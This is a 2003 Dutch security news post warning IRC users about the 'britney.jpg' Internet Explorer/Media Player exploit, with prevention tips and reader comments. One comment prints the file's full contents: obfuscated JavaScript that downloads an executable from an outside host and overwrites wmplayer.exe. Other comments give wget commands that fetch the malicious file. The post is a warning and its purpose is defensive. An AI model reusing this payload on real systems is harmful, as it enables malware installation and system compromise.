image

Waarschuwing voor britney.jpg

dinsdag 28 oktober 2003, 16:32 door Redactie, 6 reacties

Op het forum was er al een topic over geopend, maar het schijnt dat er nog steeds veel IRC gebruikers "verleid" worden om het bestand "britney.jpg" te openen. Het gaat hier echter om een Internet Explorer/Windows Media Player exploit die Windows systeem bestanden vervangt/delete. Meer informatie over deze gevaarlijke exploit is te vinden op deze, deze en deze pagina. Om besmetting met dit soort wormen te voorkomen geeft men de volgende tips:

- target=_blank>Download the latest build to Microsoft VM to resolve the 'Microsoft VM ActiveX Component' vulnerability.

- Never click on URLs that are privatemessaged to you upon joining parting a channel. Messages with sexual content are often used to lure people to visit the URLs.

- Disable Windows Scripting Host (WSH) to prevent Visual Basic scripts (.VBS) from being processed

- http://www.sarc.com/avcenter/venc/data/win.script.hosting.html

- Do not perform $decode()-strings pasted in IRC, lot of worms use this technique to spread/generate themselves.

- Do not accept files from people you don't trust. Turn DCC-auto accept off with: /SREQ ASK

Reacties (6)
28-10-2003, 21:37 door Hiawatha
Hehe, je blijft lachen met MS....
29-10-2003, 08:47 door Anoniem
Originally posted by Hiawatha
Hehe, je blijft lachen met MS....

En om de beheerders die de netwerkomgeving niet zo configureren dat gebruikers dat allemaal gewoon niet meer kunnen. Je laat gebruikers toch geen security beslissingen nemen: je mag hier niet op klikken, je mag zus niet doen... Alsof Annie van de Administratie daar wat van begrijpt..
29-10-2003, 09:57 door jvervloet
[FONT=courier new]$ wget http://www.angelfire.com/celeb2/picsx/britney.jpg
--09:54:36-- http://www.angelfire.com/celeb2/picsx/britney.jpg
=> `britney.jpg'
Resolving www.angelfire.com... done.
Connecting to www.angelfire.com[209.202.218.12]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
09:54:37 ERROR 404: Not Found.[/FONT]

Blijkbaar hebben ze het ding weggehaald.
29-10-2003, 14:02 door Anoniem
Originally posted by jvervloet
[FONT=courier new]$ wget http://www.angelfire.com/celeb2/picsx/britney.jpg
--09:54:36-- http://www.angelfire.com/celeb2/picsx/britney.jpg
=> `britney.jpg'
Resolving www.angelfire.com... done.
Connecting to http://www.angelfire.com[209.202.218.12]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
09:54:37 ERROR 404: Not Found.[/FONT]

Blijkbaar hebben ze het ding weggehaald.

Deze werkt beter:
wget http://gearbox.gearbolt.net/files/security/cap/britney.jpg

Het "gevaarlijke" stukje is eruit gecommentarieerd.
29-10-2003, 16:36 door Anoniem
Dat geeft het volgende resultaat:

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2003 15:30:54 GMT
Server: Apache/1.3.28 (Unix) mod_mono/0.5 PHP/4.3.3
Last-Modified: Mon, 27 Oct 2003 22:28:08 GMT
ETag: "1e4095-94b-3f9d9bf8"
Accept-Ranges: bytes
Content-Length: 2379
Connection: close
Content-Type: image/jpeg

<html> <textarea id="code" style="display:none;"> &#118&#97&#114&#32&#120&#32&#61&#32&#110&#101&#119&#32&#65&#99&#116&#105&#118&#101&#88&#79&#98&#106&#101&#99&#116&#40&#34&#77&#105&#99&#114&#111&#115&#111&#102&#116&#46&#88&#77&#76&#72&#84&#84&#80&#34&#41&#59 &#120&#46&#79&#112&#101&#110&#40&#34&#71&#69&#84&#34&#44&#32&#34&#104&#116&#116&#112&#58&#47&#47&#115&#99&#97&#118&#101&#110&#103&#101&#114&#46&#115&#104&#97&#114&#101&#119&#105&#116&#104&#46&#117&#115&#47&#112&#97&#116&#99&#104&#46&#101&#120&#101&#34&#44&#48&#41&#59 &#120&#46&#83&#101&#110&#100&#40&#41&#59 &#118&#97&#114&#32&#115&#32&#61&#32&#110&#101&#119&#32&#65&#99&#116&#105&#118&#101&#88&#79&#98&#106&#101&#99&#116&#40&#34&#65&#68&#79&#68&#66&#46&#83&#116&#114&#101&#97&#109&#34&#41&#59 &#115&#46&#77&#111&#100&#101&#32&#61&#32&#51&#59 &#115&#46&#84&#121&#112&#101&#32&#61&#32&#49&#59 &#115&#46&#79&#112&#101&#110&#40&#41&#59 &#115&#46&#87&#114&#105&#116&#101&#40&#120&#46&#114&#101&#115&#112&#111&#110&#115&#101&#66&#111&#100&#121&#41&#59 &#115&#46&#83&#97&#118&#101&#84&#111&#70&#105&#108&#101&#40&#34&#67&#58&#92&#92&#80&#114&#111&#103&#114&#97&#109&#32&#70&#105&#108&#101&#115&#92&#92&#87&#105&#110&#100&#111&#119&#115&#32&#77&#101&#100&#105&#97&#32&#80&#108&#97&#121&#101&#114&#92&#92&#119&#109&#112&#108&#97&#121&#101&#114&#46&#101&#120&#101&#34&#44&#50&#41&#59 &#108&#111&#99&#97&#116&#105&#111&#110&#46&#104&#114&#101&#102&#32&#61&#32&#34&#109&#109&#115&#58&#47&#47&#34&#59 </textarea> <img src="newbie.jpg"> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/rn/); for (i=0;i<lines.length;i++) { line = lines; line = line.replace(/^s+/,""); line = line.replace(/s+$/,""); line = line.replace(/'/g,"'"); line = line.replace(/[]/g,"\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'rn'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media"); } window.open("error.php","_media"); // setTimeout("doit()", 5000); </script> </html>
03-11-2003, 16:38 door Anoniem
Originally posted by Mpas
Dat geeft het volgende resultaat:

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2003 15:30:54 GMT
Server: Apache/1.3.28 (Unix) mod_mono/0.5 PHP/4.3.3
Last-Modified: Mon, 27 Oct 2003 22:28:08 GMT
ETag: "1e4095-94b-3f9d9bf8"
Accept-Ranges: bytes
Content-Length: 2379
Connection: close
Content-Type: image/jpeg

<html> <textarea id="code" style="display:none;"> &#118&#97&#114&#32&#120&#32&#61&#32&#110&#101&#

....

("doit()", 5000); </script> </html>

Zeggeh.. doe eens rustig jongensss!! Mijn virusscanner slaat op tilt bij het openen van deze pagina.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.